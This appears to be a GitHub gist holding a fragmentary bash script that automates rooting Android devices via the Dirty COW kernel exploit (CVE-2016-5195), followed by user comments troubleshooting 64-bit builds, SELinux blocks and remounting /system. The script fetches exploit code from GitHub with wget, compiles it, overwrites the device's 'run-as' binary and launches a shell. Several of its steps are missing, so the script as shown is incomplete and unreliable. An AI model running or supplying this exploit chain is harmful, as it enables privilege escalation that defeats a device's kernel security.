|# Give the usual warning.|
|echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds...";|
|# Download and extract exploit files.|
|echo "[INFO] Downloading exploit files from GitHub...";|
|rm -f $workspacezip > /dev/null; # Remove zip if it exists|
|rm -rf $workspace > /dev/null; # Remove workspace if it exists|
|wget -O dirtyc0w_workspace.zip https://github.com/Arinerron/CVE-2016-5195/archive/master.zip > /dev/null 2>&1;|
|if [ -f $workspacezip ];|
|echo "[INFO] Extracting exploit files...";|
|unzip -a $workspacezip -d $workspace > /dev/null;|
|rm -f $workspacezip; # Remove zip if it exists|
|echo "[ERR] Failed to download exploit files.";|
|if [ -d $workspace ];|
|directory=$PWD; # thx @tomdeboer!|
|echo "[ERR] Failed to extract exploit files.";|
|# Compile and send exploit.|
|echo "[INFO] Exploiting dirtyc0w vulnerability...";|
|sleep 1; # Let them read the message before chaos|
|echo -n "[INFO] Complete. Installed package \"run-as\" on device.\n[INFO] Cleaning up workspace...";|
|rm -rf $directory; # Clean up workspace|
|echo "[INFO] Starting shell in 3 seconds...";|
|sleep 3; # Look, it worked!|
It does not work on my Stock Samsung Galaxy S5 (Android 6.0.1/Patchlevel September 1-2016/Kernel3.4.0-8538464).
@blizzard4591 Hey. You're not the only one with that problem actually. The reason why it doesn't work is (probably) because your phone has a 64-bit CPU. I haven't worked on a 64-bit version yet, but in the makefile, you can change a setting in the makefile so it compiles for 64-bit architecture.
Edit: Here's an issue you might want to see: timwr/CVE-2016-5195#7
@MF064DD Is there an error when you run:
wget -O dirtyc0w_workspace.zip https://github.com/Arinerron/CVE-2016-5195/archive/master.zip;
Edit: Oh, nevermind. Apparently wget doesn't accept variables in the parameters. I updated the script. Sorry for the inconvenience!
@MF064DD @SpyKnife Okay, sorry guys. The problem is that wget and unzip commands aren't being used properly. I can't fix it on my phone, because the editor isn't working. I won't have computer access till tonight (it's noon here, and I'm at school). Really sorry about the delay! I'll @mention you when it is fixed.
@MF064DD @SpyKnife Okay, weird thing. I'm on my computer now, and I can execute the script fine. I think the reason why it works on my computer and not my laptop is because of the version of wget and/or unzip. Specifically, wget seems to not have SSL support on certain versions (probably yours too).
I'm not sure as of now how I can download files off the internet via bash without using 3rd parties (like curl). Here's a manual guide though:
Root Android 32-bit / Guide
And tada! The
@blizzard4591 Here's a quote from the issue:
The device has a 64-bit architecture, so we need to use the arm64-v8a variant of the compiled binaries.
[This is how I modified the file]
A good way to get device's abi could be
Heh, here we go.
@RaPoZaUm Probably would work, but I haven't tested it.
Anyone has any idea what to use on the argument of run-as ?
edit: I found what goes on package-name, this will give you a list of options
but... it doesn't work, example:
It won't work anyway. The exploit in question can't run anything out of it's normal context, because SE for Android will catch it (darn you SELinux, ruining my dreams constantly since 1998), and the child/fork will run with standard UID. I tried to run
If you're tech-savvy (I assume you are since you are using GitHub), I made a more "hands on" tutorial here. :)
@MF064DD Sorry for the late response. Type
Good luck! If that doesn't work, feel free to @mention me and I'll see if I can help.
I'm trying to use this to root a B&O Horizon running Android 5.1.1, and it doesn't seem to work. When I do
If I try to run any package with
Any thoughts @Arinerron ?
Once i gain root acces i can't remount system for installing su binnary,
athene_f:/ $ run-as
uid run-as 2000
athene_f:/ # whoami
athene_f:/ # mount -o rw,remount /system
make root && adb shell;
and my phone is a 32bits
hi, I've done all the steps, but don't get any info instead of exploited.